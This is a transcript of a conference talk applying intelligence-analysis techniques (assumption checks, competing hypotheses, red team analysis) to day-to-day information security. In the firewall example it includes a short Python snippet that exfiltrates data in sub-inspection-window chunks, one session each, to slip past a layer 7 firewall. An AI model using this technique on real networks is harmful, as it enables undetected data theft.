Thank you everybody for joining me for Structured Analytic Techniques for Improving Information Security Analysis. I'm Rabbit. No, really, I am. I'm sometimes also known as JJ professionally, if I need a boring name for resumes and things. I'm currently the head of product security and security operations for a company called Latch. Latch makes smart access devices, smart home integrations, and a number of Internet-of-Things-variety products for residential buildings. We like to think that we make things that are a step above what you probably typically think of when you hear the term Internet of Things.

In background, I'm a former biometric device tester, and I've done some medical security and hospital engineering. I entered information security from the field of epidemiology and public health research, so the previous year and a half has been a real interesting ride, having some of that become national news. My informal introduction to information security was when I completely wrecked the PDP-11/84 at my high school. You never forget the sound of the heads hitting the platters on those old drives. That's all I'm saying about that. And an interesting thing about me: I was raised around my father's very weird and large collection of robots, so I'm basically a budget version of Shinji Ikari.

So what are structured analytic techniques? Structured analytic techniques are a set of tools: fun ways to manipulate data that can help you discover and eliminate biases. They can improve the accuracy and reliability of your solutions. They can ensure that all data is being equally considered and included during analysis, and they can enhance your creativity.

So where did this come from? A few years back I was browsing files on the CIA.gov website, as one does, and I came across something called "A Tradecraft Primer: Structured Analytic Techniques for Improving Intelligence Analysis," prepared by the US government. I never found out who actually wrote this thing, but I assume it's one of these people. And there's no connection between me and the CIA, or me and these authors; I just happen to be a guy who found it. I do think, though, that maybe one of them might see this eventually, so just in case: good paper. And also, just to point out, anything the CIA publishes with the words "a tradecraft primer" on it, I am absolutely going to read.

So what portion of this is mine? What have I done? I initially thought about this, mostly as it rattled around in my head, in terms of how you might use it for open source intelligence or for threat intelligence. It's kind of a natural fit: intelligence analysis. But like all of us, I probably don't do anything that cool most of the time. Most of my time is spent doing more normal infosec stuff for my orgs. So I started thinking about how I could apply the same techniques to the stuff I do on a more day-to-day basis, stuff that's more mundane or that might have a more widely applicable user base.

There are three types of structured analytic techniques. The first type is diagnostic techniques; those are used to improve quality and make sure your analyses are based on quality information. The second type is contrarian techniques; these are for making sure analyses are not biased or based on limited thinking. And the last type is imaginative thinking techniques; these are for developing new insights, breaking out of the box, or seeing things from potentially new views.
So the first structured analytic technique we'll take a look at is called a key assumptions check. It's kind of an easy one to start with, and it's very easy to describe. It's literally thinking about all the assumptions you made when coming to a conclusion or performing an analysis, and writing them down: creating a list of things you've just assumed. You review the assumptions periodically as you do the analysis, just to see if your opinion of them has changed. Maybe you discover you made an assumption you don't remember making, or didn't think of as an assumption at the time, or maybe you need to do some rethinking about some of the stuff you had assumed in the first place.

An example of how this might help you in information security: let's say you're replacing an old layer 3 firewall with a new next-gen, blinky-light layer 7 firewall. It's got deep packet inspection, it does protocol identification, and all kinds of cool things your layer 3 didn't. What are some assumptions you may have made in that decision that may come back to bite you? Well, you may have assumed that newer is better; it often is, but it isn't always. You may have assumed that the default settings on the new firewall would block malicious traffic; maybe you brought it out of the box and put it in place, and it's expecting you to do a lot more tuning than you realize. You may have assumed you really only need to worry about incoming packets versus exfiltration or outgoing traffic. Or you may have assumed that it doesn't pass traffic until it knows whether that traffic is good or bad. That last one is particularly why I chose this example, because I've encountered layer 7 firewalls that allow 32K or 64K of data to move before they decide whether the traffic is bad or not. At the time, as someone who was trying to exfiltrate, all that really meant to me was that if I cut my data into 32K or 64K chunks, I could pass right through the firewall by just restarting the session every 32K or 64K, and it would never clamp off on that protocol as being malicious, because it didn't have time to.
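To make that last assumption concrete, here's a minimal sketch of the trick, assuming a hypothetical firewall that only classifies a session after inspecting its first 32K of payload; the threshold, host, and port are illustrative placeholders, not any real product's behavior:

```python
import socket

INSPECTION_WINDOW = 32 * 1024      # hypothetical bytes the firewall sees before classifying
CHUNK = INSPECTION_WINDOW - 1024   # stay safely under the window

def exfiltrate(data: bytes, host: str, port: int) -> None:
    """Move data out in sub-window chunks, one TCP session per chunk."""
    for offset in range(0, len(data), CHUNK):
        # Each new session resets the firewall's byte counter, so it never
        # accumulates enough of any one session to classify the protocol.
        with socket.create_connection((host, port)) as conn:
            conn.sendall(data[offset:offset + CHUNK])
```

The code isn't the point; the point is that "the firewall inspects traffic before passing it" turned out to be an assumption with an exploitable boundary.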
So another technique is the quality of information check. That's basically where you go through all of your information and judge it for its strengths, its weaknesses, its importance, and your confidence in it. It's something you can use throughout the analytic process, and you should probably be performing it periodically. It helps you detect errors in the processing or collection of information, errors in translation, or errors in interpretation. It can identify deception or denial strategies, if you happen to discover some specific problem with your data. And it can assist in communicating the amount of confidence you have in your assumptions and key information. It's pretty easy to do: you take each piece of information you're basing your assumption or conclusion on, identify which of them are critical to that result, and then, if it involves interpreted information, consider whether it has been interpreted in the right context, with a complete understanding of how it should probably be interpreted.

Say you're working in incident response and analyzing a log file sent to you by an ops team. What are some quality of information checks you could do to make sure you're working with quality source material? Well, you might check that the timestamps are accurate. They probably aren't. Are you confident that the log hasn't been tampered with? Is there some mechanism you can use to prove it has some veracity, that the log is real in the first place? You know, maybe someone left one for you to find. And lastly, does the log even capture the type of information you're looking for? Maybe you have your device configured such that the event you're looking to correlate isn't even captured in that log. Those are all things you could check to improve the quality.
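You can keep this in a spreadsheet, but as a minimal sketch with invented field names, recording those judgments might look like the following; the point is forcing yourself to write down criticality and confidence for each source:

```python
from dataclasses import dataclass

@dataclass
class Evidence:
    description: str
    critical: bool      # does the conclusion fall over without this item?
    reliability: int    # 1 (weak) .. 5 (strong), your honest judgment
    interpreted: bool   # derived or translated rather than observed directly

def weak_pillars(items: list[Evidence]) -> list[Evidence]:
    """Critical evidence you aren't confident in: re-collect or corroborate."""
    return [e for e in items if e.critical and e.reliability <= 2]

sources = [
    Evidence("ops team syslog export", critical=True, reliability=2, interpreted=True),
    Evidence("netflow from our own collector", critical=True, reliability=4, interpreted=False),
]
for e in weak_pillars(sources):
    print(f"Needs corroboration: {e.description}")
```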
Another technique: indicators or signposts of change. This is where you create a list of events or monitoring targets that will tell you if your situation has changed. Essentially, you identify a bunch of competing hypotheses, ways the situation may go, and then you create a list of potential activities, statements, or events for each scenario. If things start going down one of those paths, what would you expect to start seeing happen? Then you regularly review and update your indicators to make sure you're watching for those things. If you start seeing the indicators in your environment, you've got some idea of which scenario may be taking place.

For an information security example: you want to protect your organization from a system-wide ransomware attack, and you think you're in good shape because your org uses cloud storage and your domain controllers are regularly patched. What might be some signposts that your assessment, that you don't really need to worry too much, is changing, and that you need to rethink that risk or conclusion? Well, if ransomware attackers start specifically targeting cloud storage providers a lot more, that's a fundamental change to their tactics, their TTPs, by your estimation, so that should cause you to rethink your conclusion. Or what if there's a vulnerability in a domain controller, and Microsoft releases a patch that doesn't fully fix the issue? That would never happen, of course. But knowing it exists, you would have to consider: will your conclusion, your decision that you are protected, hold up over the next one, six, 24, 48 hours?
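There's no special tooling implied here; even a plain scenario-to-indicators table that you revisit on a schedule does most of the work. A minimal sketch, with invented scenario and indicator names matching the ransomware example:

```python
# Hypothetical watchlist: each scenario maps to the indicators that would
# tell you it's becoming more likely. Names are invented for illustration.
watchlist = {
    "attackers pivot to cloud storage": [
        "public reporting of ransomware TTPs targeting cloud storage",
        "anomalous mass-download or mass-encryption activity in our tenant",
    ],
    "domain controller patch incomplete": [
        "vendor advisory revised or reissued for a patched CVE",
        "proof-of-concept exploit published against the 'fixed' issue",
    ],
}

def review(observed: set[str]) -> None:
    """Each review cycle, flag any scenario with an observed indicator."""
    for scenario, indicators in watchlist.items():
        hits = [i for i in indicators if i in observed]
        if hits:
            print(f"Rethink the conclusion for '{scenario}': {hits}")

review({"vendor advisory revised or reissued for a patched CVE"})
```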
Another diagnostic technique: analysis of competing hypotheses, or ACH. This is basically identifying all of the reasonable alternative explanations, and then weighing the evidence against them to determine whether your evidence supports or refutes each potential hypothesis. And this is specifically done without conjecturing about the probability of any hypothesis being true; that's dangerous. The goal is to take your data, your bits of evidence, weigh each against each of the hypotheses, and decide whether each piece of evidence supports that particular hypothesis, refutes it, or maybe doesn't contribute to it in any meaningful way. You go through one at a time and create a matrix of which bits of evidence support or refute which hypotheses, with the goal of refuting or disproving hypotheses, not proving them. That's to prevent you from latching on to one particular result you might favor for some reason or feel is the most likely. You're not trying to do that; you're trying to make sure you've identified all of the possible potential hypotheses.

It reminds me of a sort of famous quote: "when you have eliminated the impossible, whatever remains, however improbable, must be the truth," which is of course from House, M.D.

For example, you're asked to investigate the defacement of an internal wiki page; someone has replaced all the tutorial videos with links to hardcore porn. The logs don't show any edits. In fact, you don't see any activity on those pages for several years. How might you use ACH to help you come to a conclusion about what happened? Well, you might conjecture: couldn't an admin have made the changes and scrubbed the logs? That might be possible. Couldn't an engineer have made the changes on the back end, and that's why your logs don't match up? Could an external attacker have compromised the wiki system in some way you don't know about yet? Or could the videos themselves have changed somehow? And hopefully it's clear to a lot of you that I'm alluding to a recent event where a company purchased a domain that used to host fairly innocuous videos, and that domain now hosts hardcore porn. As a result it's showing up in a lot of old pages that haven't been touched in a while, because it's true: the actual videos themselves are what changed.
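As a minimal sketch of the bookkeeping, here's the wiki example as a matrix; the evidence rows and scores are invented for illustration, and the ranking follows the usual ACH convention of counting evidence against each hypothesis rather than for it:

```python
# Columns are hypotheses; rows are evidence. "+" = consistent,
# "-" = inconsistent, "0" = doesn't meaningfully bear on it.
hypotheses = ["admin scrubbed logs", "backend edit",
              "external compromise", "videos changed upstream"]
matrix = {
    "wiki logs show no edits":          ["+", "+", "0", "+"],
    "page content matches old backups": ["-", "-", "-", "+"],
    "video domain changed owners":      ["0", "0", "0", "+"],
}

# ACH ranks by how much evidence is INCONSISTENT with each hypothesis;
# the survivor is the one with the least against it, not the most for it.
inconsistencies = {h: sum(row[i] == "-" for row in matrix.values())
                   for i, h in enumerate(hypotheses)}
for h, count in sorted(inconsistencies.items(), key=lambda kv: kv[1]):
    print(f"{count} inconsistent item(s): {h}")
```

Here "videos changed upstream" survives because nothing refutes it, even though it probably wasn't anyone's first guess.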
So now let's get to the contrarian techniques. Probably the one people are most familiar with is devil's advocacy. However, I've noticed that some people understand the term devil's advocacy to mean arguing the opposite viewpoint, or taking an intentionally contrary viewpoint to argue with. In the context of the original US government document, it's more like red-teaming your analysis: you take your own analysis, and then another faction, or you playing another role in the analysis process, attacks that analysis to find weaknesses, things that might not be supported, things that might not be as reliable as you're treating them in the final analysis. It's intended to let you test whether your key assumptions will hold up under different circumstances, and it helps you identify faulty logic.

An information security example of devil's advocacy; it's a bit of a scenario, this one. You're wrapping up a report on what happened during an event. You're mostly confident you've arrived at the right conclusion as to how an attacker was able to gain access to a database and exfiltrate data, but the stakes are high. Let's just say that if this happened again, your company is going under. It's that important; you have to be as close to 100% certain about this as possible. So what can you do to ensure that the result you've come up with, your hypothetical scenario, is as accurate as it can possibly be? Well, that's where you bust out devil's advocacy. Maybe you take one of your really good analysts, or maybe it's you functioning in this particular role, and have them go through your report looking specifically for weaknesses in the things you've assumed, weaknesses in the evidence, potential faults that might disqualify some piece of evidence you're relying on. They basically tear it apart. And while they're doing that, they create a report: here are all the problems with this analysis. Then they present that to the group.

Now the group can take a look at that and push back: well, you know, this really is well founded, for whatever reason. Or they might say: all right, you're right, we need to go find some additional corroborating evidence to support this one particular piece, because it's a weak pillar of the final result. And that helps you make sure your final product is based on the strongest possible determinations from the process.
Very similar to devil's advocacy is Team A/Team B analysis. A lot of people get these mixed up, and in fact, if you do a Team A/Team B analysis wrong, you can end up turning it into devil's advocacy. The difference is that Team A/Team B is used when you have two potential results or final conclusions that are roughly equally probable, or at least held with equal confidence, and you're not quite sure which one is stronger. What you might do in that situation is take each of those hypotheses, give them to two different teams, and let each team pursue one as its own analysis. An additional trick often used in Team A/Team B analysis is to take somebody who favors one particular outcome and put them on the team for the opposite outcome. It isn't just to make them angry; it's because they may have insights, or understand connections in the data, that the other team hasn't realized, and it lets you cross-pollinate that understanding of the issue.

For an information security example: you and your team are trying to decide how best to reduce the number of malware incidents you're experiencing within your organization. Let's say you have limited budget, time, and engineering resources, and you can only really go with one thing. One group of your analysts wants a strategy involving endpoint policy updates, changes to something on the endpoint. The other group thinks the right way to go is to put money into network anti-malware boxes that can stop stuff before it even gets to the endpoint. One thing you might do is tell each of those two groups to run with their idea and produce an analysis of why their solution is the best option and why we shouldn't take the other one. You might use the cross-pollination trick by taking advocates of endpoint restrictions and putting them on the network restrictions team, and vice versa. The final bit is that you have an agreed-upon, formal judgment method. Maybe the relevant manager decides which case was most compelling, or maybe a panel of experts listens to the arguments and decides who had the best argument for that particular way forward. It's a bit of a debate tactic, but it can let you pull the best out of two options in very close situations.

Next: high-impact, low-probability analysis. This is for when you have an event that would have dire consequences if it happened, but no one thinks it will happen. It's very useful when decision makers are convinced an event is unlikely, but maybe haven't given sufficient thought to the consequences of its occurrence; they've kind of dismissed it because it's so unlikely. It can be used to uncover hidden relationships, and it can help analysts develop signposts, kind of like we were talking about earlier, which can provide early warnings of a shift in the situation. When you do it, you define the high-impact outcome clearly: what actually happens if this occurs? Then you devise one or more pathways, series of events, that could potentially get you there. You start from a known good state and work your way toward the high-impact event; that's important when comparing this with a technique coming up shortly. You think about possible triggers or changes that could affect the outcome. Maybe it seems very unlikely because no one has access to the proper keys, so a triggering event might be those keys getting released or exposed somehow; that changes the whole scenario, and now you need to rethink how low the probability actually is. Then you identify a set of indicators for each pathway that can be monitored, and you set about monitoring them. Assuming you can't do anything to fundamentally reduce or remove the risk, at least now you have a set of indicators, so you may get some advance warning that it's coming and be able to take corrective action.

Say you're concerned that your organization is not taking seriously the risk of having too many unnecessary domain admins. Most of the domain admins don't need that level of permission, but the stakeholders believe it hasn't been a problem: it makes changes quicker in an emergency, and it keeps security from being a bottleneck, because people don't have to ask permission if they already have full admin. You're concerned about the risk of a compromised admin credential, or about the damage an internal attacker could do. So maybe you conduct a high-impact, low-probability analysis. You highlight the huge impact if this very low-probability event occurs. You lay out several pathways through which it could occur: credentials get leaked, weak passwords get chosen by the people who hold these accounts, or an internal attacker has a really bad day or gets some news they don't like. You identify potential indicators that these events are occurring. At least now you've got some idea of what to look for. You may not be able to fix the situation, though hopefully you're working on the organization to reduce the number of admins, but you've got things you can watch for: you can look for indications that credentials have leaked, and you can test for weak passwords in some ways. There might be some stuff you can do.
So, what-if analysis. A what-if analysis is often confused with a high-impact, low-probability analysis, but it's really almost a high-impact, low-probability analysis done backwards. With high-impact, low-probability analysis, you start at a base state and construct a path by which you may arrive at the high-impact event. With what-if analysis, you start with the high-impact event and work your way back to identify the things that would have had to happen for that scenario to occur. It's coming at it from the other direction. You start by assuming the event has happened. You select some triggering events that may have permitted the scenario to occur. You develop a chain of argument as to how the outcome could have come about, working backwards as I mentioned, and you generate a list of indicators for each of those stages. So where your high-impact, low-probability analysis identified things you might monitor to detect the scenario starting or in progress, you now have additional indicators for activity at each stage, so if the event has already occurred, you can catch it before you've worked all the way back up the chain.

For an information security example, consider again that same scenario where you're concerned about the potential for domain admin credentials to become compromised. This time, assume they're already compromised. How did that happen? You might identify the same vectors as before, like leaked or weak passwords, or inside attackers. However, because you're thinking in the other direction this time, it might occur to you that maybe a help desk machine holds cached credentials, because someone logged in with domain admin creds on a box that was set up to cache them. So you might decide to add to your list of things to watch for or check for: excessive caching of credentials, especially domain admin creds. And maybe there's something you can do to catch people using domain admin creds for needless local logins. Now you've got a little more information about things that might work in your environment for detecting these specific types of problems.
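For that credential-caching check specifically, here's a minimal sketch assuming a Windows endpoint; it reads the CachedLogonsCount value that controls how many domain logon verifiers Windows keeps for offline logon. What count is acceptable is your policy call, and rolling a check like this out across a fleet is left to whatever management tooling you already have:

```python
# Windows caches domain credential verifiers for offline logon; the count
# is controlled by the CachedLogonsCount value under the Winlogon key.
import winreg

def cached_logons_count() -> int:
    key = winreg.OpenKey(
        winreg.HKEY_LOCAL_MACHINE,
        r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
    )
    try:
        value, _type = winreg.QueryValueEx(key, "CachedLogonsCount")
        return int(value)  # stored as a string, e.g. "10"
    finally:
        winreg.CloseKey(key)

if cached_logons_count() > 0:
    print("This host caches domain logons; admin creds used here leave a verifier behind.")
```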
Moving on to the imaginative thinking techniques. I think these are probably the most obvious, the easiest for people to wrap their heads around. People are used to the idea of brainstorming; they've heard that term a lot. The thing is, the source material talks about brainstorming as a group activity, structured brainstorming. When we just say brainstorming, we often think of it as coming up with things off the top of your head, things that might be off the wall. That's true, and you can do that by yourself, but in this context they're talking about a group activity. It's quickly generating a range of hypotheses that can then be refined, tested, further developed, or discarded. It creates raw material you can work from: ideas you can later test your evidence against, deciding which you can discard right off the bat and which might be the result. It gives you more creative points to start your analysis from. Typically, as a structured analytic technique, this is done by assembling a group of analysts, or others with relevant knowledge, to generate ideas that can plausibly fit the supplied evidence. And you never censor an idea. You take whatever people throw at you, no matter how outlandish, and you throw it up on the board. If it's really outlandish, you use that as an opportunity to find out: where did that come from, what were you thinking? Maybe there's some information in that connection. It didn't occur to you to make it, but they might have some understanding that caused them to reach it, or maybe they're thinking about the problem space in a completely different way, and that's why it seems oddball to you; when you talk it through with them, it'll seem less oddball.

How might you use that in infosec? Say your new Internet of Things product must store credentials and tokens so it can communicate with your service, but the selected hardware doesn't contain a secure element. You don't have any way to securely store the material or resist recovery; we'll just assume that on this fictional device, you can always get the creds off of it. How might you address the risks of credential theft or cloning? I don't know, but maybe brainstorming would come up with some ideas. Maybe there's some other immutable characteristic of the device we can use to identify it, so we don't need to store a specific token. Maybe we just don't have credentials and tokens in the first place: what if we rethought how the product works and got rid of them somehow? Or maybe it's a feature; maybe we want people to clone them, maybe that's a great idea and it enables some other business model.

So, red team analysis. I think with this technique we have to be careful to understand what red team analysis actually means in this context. As used in the structured analytic techniques, it's more what I would consider a threat simulation or adversary simulation: you're analyzing what the red team, the adversary, might do, rather than red-teaming your analysis. To do it, an analyst takes on the position of a potential adversary, tries it on in a thought space, and tries to keep in mind the motivations and constraints the adversary is driven by or restricted by. Then they develop a list of first-person questions the adversary may be trying to answer for themselves: what would I do with this particular result? If I reach a certain point of exploitation, what would my next priority be? What is my ultimate goal? It might be specific to those threat actors. You then lay out and prioritize all the possible next steps the adversary may take, based on the answers you came up with while play-acting that role. Once you've laid out and prioritized all those possible next steps, you've got another set of great things you can look for and monitor, which will help you figure out whether these sorts of activities are occurring in your environment.

An information security example: you've set up several high-interaction honeypots in various places on your network's periphery, and you notice a potential attacker. They always connect at about the same time; they connect real quick, they get in, they run a few meaningless-seeming commands, they check the user ID to make sure they're root, maybe they enumerate some processes and dump some information about what kernel is running, and then they leave. They do that over and over and over and never do anything more with it. So you might find yourself asking: what's wrong with my honeypots? Well, you might conjecture that the attacker is detecting it's a honeypot and just dropping off, so maybe you need to change something up. Or you might decide the attacker is really looking for a specific type of host, maybe a certain processor or code revision, to pull off whatever they're looking to exploit this host for, and that's why they're not interested. Or does the attacker have a lot of compromised systems already, and they're just doing this because they want to know if it's still active, keeping it in the loop in case they ever need it someday? Maybe it's all automated; maybe no human has ever touched this, some bot just popped your honeypot and reported home, "hey, I got something," and it went into some list in a C2 to be used someday. Knowing the viewpoint of your attacker, and why they may be doing what they're doing, helps here. In this scenario I threw in that the IP tips you off that it's some specific actor; I don't think that normally happens, but let's assume. You could say: I understand this from the attacker's point of view. They've got a ton of these things, so if we keep watching, eventually they'll likely come back and actually use this for something useful to them.

So what have we learned? If you're concerned about information quality, use the diagnostic techniques. If you're concerned about biases, use the contrarian techniques. If you're concerned about completeness, use the imaginative thinking techniques.

And where can you learn more? The document I started with is fantastic; it goes into way more depth, and you should really read it if you found any of this interesting. There's also a great document from the RAND Corporation where they analyze that first document and decide whether they think it's any good; that one's fantastic too. And then there's a book, Structured Analytic Techniques for Intelligence Analysis, by Richards Heuer and Randolph Pherson. It's $900 on Amazon, so I didn't read that at all. I hear it's really good. If someone can get me a copy of that book, I would love to read it, but I'm definitely not paying that.

If you have any questions, I'm Rabbit. I'm pretty easy to find on Twitter, or you can email me; I'll respond when I'm around. And thank you for listening to me blabber for half an hour about structured analytic techniques.